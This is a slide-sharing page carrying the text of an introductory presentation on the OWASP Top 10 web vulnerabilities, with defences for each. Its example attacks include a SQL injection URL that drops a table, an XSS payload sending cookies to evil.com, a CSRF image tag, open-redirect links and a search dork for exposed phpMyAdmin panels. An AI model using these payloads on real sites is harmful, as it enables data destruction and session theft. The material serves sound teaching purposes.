Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...apidays
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Zilliz
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 

Último (20)

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 

Presentation on Top 10 Vulnerabilities in Web Application

  • 1.
  • 3.  What is OWASP (Open Web Application Security Project)? ◦ http://owasp.org ◦ Worldwide non-profit focused on improving software security ◦ Reaches out to ALL developers: not just security professionals  Who am I? ◦ Jr. Software Engineer @IECL ◦ Student of Asian University of Bangladesh ◦ Here to share some knowledge  What will you learn? ◦ The top 10 security mistakes that developers make ◦ How to design software with an assurance of security
  • 4. 1) Injection 2) Broken Authentication and Session Management 3) Cross Site Scripting 4) Insecure Direct Object References 5) Cross Site Request Forgery (CSRF) 6) Security Misconfiguration 7) Insecure Cryptographic Storage 8) Failure to Restrict URL Access 9) Insufficient Transport Layer Protection 10) Unvalidated Redirects and Forwards
  • 5.  Used when your app sends user-supplied data to other apps ◦ Database, Operating System, LDAP, Web Services  Hackers "inject" their code to run instead of yours ◦ To access unauthorized data, or completely take over remote application ◦ Example: SQL injection attack $query = "SELECT * FROM products WHERE id = “.$id;
  • 6.  Code expects a nice parameter in the URL • http://example.com/products?id=123 • Hacker could instead supply this : http://example.com/products?id=';+DROP+TABLE+'pr oducts';
  • 7.  Ensure that all parameters are validated before they are used.  Check verses exactly what input should be allowed.  Ideally, only allow the user to select among "safe" options ◦ no generic text allowed
  • 8.  HTTP is a "stateless" protocol ◦ Nice and simple: HTTP request, HTTP response ◦ All data must be passed in the request every time  How do we store state? ◦ Client side with cookies ◦ Server side with sessions  Most apps place a "sessionId" in cookies, or in the URL ◦ Problem: now stealing sessionIds is just as good as stealing passwords!  Multiple ways to determine a session ID ◦ packet sniffing -- especially on an open WiFi access point ◦ HttpReferrer logs, if sessionId is in the URL
  • 9.  Assume that a user stole a session ID ◦ Determine how bad this would be in your application  Use SSL everywhere! ◦ Makes it harder for people to “sniff” your session ID  If you cannot use SSL everywhere, use it for logins ◦ Have a cryptographically strong session ID  Good sessionIds should be very difficult to re-use ◦ Embed user IP address, user name, timestamp, and a secret ◦ Forces an attacker to spoof IP addresses to take over ◦ Prompt for re-login if IP changes during a session
  • 10.  Sites must "cleanse" user input before displaying it  Hackers can create URLs to inject their own HTML onto the page ◦ can be used to do almost any kind of attack!!!  Example: JSP to draw HTML based on user input ◦ String html = "<input name='item' type='TEXT' value='" + request.getParameter("item") + "'>";
  • 11.  Code expects a nice URL: ◦ http://example.com/buy?item=123  But a hacker could supply this: ◦ http://example.com/buy?item='><script>document.location='htt p://evil.com/steal/'+document.cookie</script>  Then, try to trick somebody to go to that URL ◦ Stolen cookies are frequently as good as stole passwords
  • 12.  Never, ever, ever trust user-submitted content! ◦ URLs, comments threads, web forms  Properly "escape" any data before displaying it on web pages ◦ JavaScript parameters, URL parameters, STYLE elements ◦ Remove script tags, and possibly anything with a SRC attribute ◦ Use ESAPI to "cleanse" your HTML  Do not allow state-change from HTTP GET requests ◦ Otherwise, an IMG tag could cause you to lose all your data  Set the HttpOnly flag in your response headers ◦ Prevents document.cookie from working in JavaScript
  • 13.  Assume my project id is 123  I see a link on “My Projects” page that goes here: ◦ http://example.com/projects/123  If I alter the URL, can I see other people’s projects? ◦ http://example.com/projects/124  Do you only restrict access in the web form?  What if I could "guess" the URL? Could I see the page? ◦ Don't trick yourself into thinking complex URLs are any more secure ◦ Security != Obscurity
  • 14.  Every resource needs a security level ◦ What roles do you need to access certain items? ◦ Access Control Lists are easy to implement, but don’t always scale  All access to that resource should go through the same check ◦ What action are you taking, with what resource? ◦ Put it all in one common codebase for simplicity ◦ May need to run check multiple times, for sub-actions and sub- resources ◦ Unusual behavior? Have additional authentication questions/layers!  Front-end restriction is nice for usability, but not security  Back-end application must double-check access rights
  • 15.  Most web applications depend on some kind of framework ◦ Weblogic, Spring, ADF, Ruby on Rails, Open Source Libraries ◦ JARs and JARs and JARs of fun...  What if your framework issued a security patch? ◦ Do you have a centralized policy for keeping dependencies up-to- date? ◦ How long would it take you to discover new code? ◦ How long would it take to recompile/test/redeploy?
  • 16.  Do you know all security configurations in the framework? ◦ Odds are no... documentation is usually obtuse ◦ “Being helpful is a security hole”  Have you properly "hardened" your framework? ◦ Delete default users, disable unused services and ports
  • 17.  Subscribe to newsletters and blog feeds to get patches ◦ Install the patches as quickly as possible  Do periodic scans to detect misconfiguration / missing patches  Disable features that are "nice" for developers, but "nasty" for security  Use automation to ensure patches are up-to-date ◦ If you can't verify it, it's not secure ◦ Can you prove glass is bulletproof without firing bullets at it?  Taking over websites shouldn't be this easy: ◦ http://www.google.com/search?q=inurl:SELECT+inurl:FROM+inurl :WHERE+intitle:phpmyadmin
  • 18.  Bad guys get credit cards, personal identification, passwords or health records.  Your company could be fined or worse.
  • 19.  Is any of this data stored in clear text long term, including backups of this data?  Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous.  Are any old / weak cryptographic algorithms used?  Are weak crypto keys generated, or is proper key management or rotation missing?  Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser?
  • 20.  make sure you encrypt all sensitive data at rest and in transit in a manner that defends against these threats.  Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t have can’t be stolen.  Ensure strong standard algorithms and strong keys are used, and proper key management is in place.  Ensure passwords are stored with an algorithm specifically designed for password protection, such as bcrypt, PBKDF2, or scrypt.  Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.
  • 21.  Similar to #4: Insecure Direct Object Reference ◦ Need to block specific actions, even if no resource is identified  Example: my project is 123  I will see these URLs on my home page: ◦ http://example.com/project/123 ◦ http://example.com/user/getProjects/
  • 22.  I could fish around and try other URLs as well: ◦ http://example.com/manager/getProjects/ ◦ http://example.com/admin/getProjects/  Would your application prevent this?  Same general issue: ◦ you have front-end security, but not back-end security
  • 23.  Do authentication checks at least twice ◦ Front end UI, and back end Controller  Don't draw URLs to the page if the user cannot access them ◦ Bad usability ◦ Hackers might be tempted to fish around for vulnerabilities  Never assume a URL is allowed ◦ Do back-end checks for access, and state change
  • 24.  Add even more layers as needed: ◦ Does all security information exist in the URL?  Can you authenticate right away?  Might you need to get half way through the request before you know what rights are needed? ◦ What if the user has access, but their behavior is unusual  should you prompt for password again, or perhaps for additional authorization?
  • 25.  Evil sites can hijack your browser, and run secure request: 1) User logs into secure application behind the firewall http://example.com/myApp 2) User goes to "evil" website, or loads up "evil" HTML email 3) HTML contains this image: <img src="http://example.com/myApp/deleteEverything"></img>  With JavaScript and XSS, evil sites can completely take over your browser ◦ Can browse around your intranet, log into bank accounts ◦ Anything you are currently logged into ◦ Complete control, as long as you stay on the evil site  Unfortunate side-effect of Single-Sign-On
  • 26.  All state change should require a unique token in the request  But if its in the URL, it's vulnerable! ◦ URLs are frequently logged, and can be "sniffed" ◦ avoid reusable tokens  General solution: ◦ All state change requires HTTP POST, not a GET ◦ Put one-time token in a hidden field on the web form ◦ After POST, do a GET redirect to a confirmation page
  • 27.  What kind of token? ◦ Single-request tokens: safest, but a pain ◦ Session-based tokens hashed with session ID and action  Require multiple-level authentication ◦ If an action looks fishy, re-prompt user for login
  • 28.  Some vulnerable components (e.g., framework libraries) can be identified and exploited with automated tools.  Attacker identifies a weak component through scanning or manual analysis.  He customizes the exploit as needed and executes the attack.
  • 29.  Identify all components and the versions you are using, including all dependencies. (e.g. the versions plugin).  Monitor the security of these components in public databases, project mailing lists, and security mailing lists, and keep them up to date.  Establish security policies governing component use, such as requiring certain software development practices, passing security tests, and acceptable licenses.  Where appropriate, consider adding security wrappers around components to disable unused functionality and/ or secure weak or vulnerable aspects of the component.
  • 30.  Most sites allow redirects to other sites, or pages within the site: ◦ http://example.com/redirect?url=google.com  But, open redirect pages can be used by "phishers" to create links to their site: ◦ http://example.com/redirect?url=evil.com  Link looks like it goes to "example.com", but it goes to "evil.com"  Or, can trick a site user into harming their own site: ◦ http://example.com/redirect?url=/admin.jsp?deleteEverything=tru e  Sometimes called "phishing holes"
  • 31.  Simply avoid using redirects and forwards.  If used, don’t involve user parameters in calculating the destination. This can usually be done.  If destination parameters can’t be avoided, ensure that the supplied value is valid, and authorized for the user.  Restrict redirects to a limited number of "trusted" sites  Keep a list of all redirect URLs, and pass the ID in the request, instead of the URL ◦ http://example.com/redirect?urlId=123  Hash the URL with a secret, and pass the hash in the URL ◦ http://example.com/redirect?url=google.com&hash=a1b2c3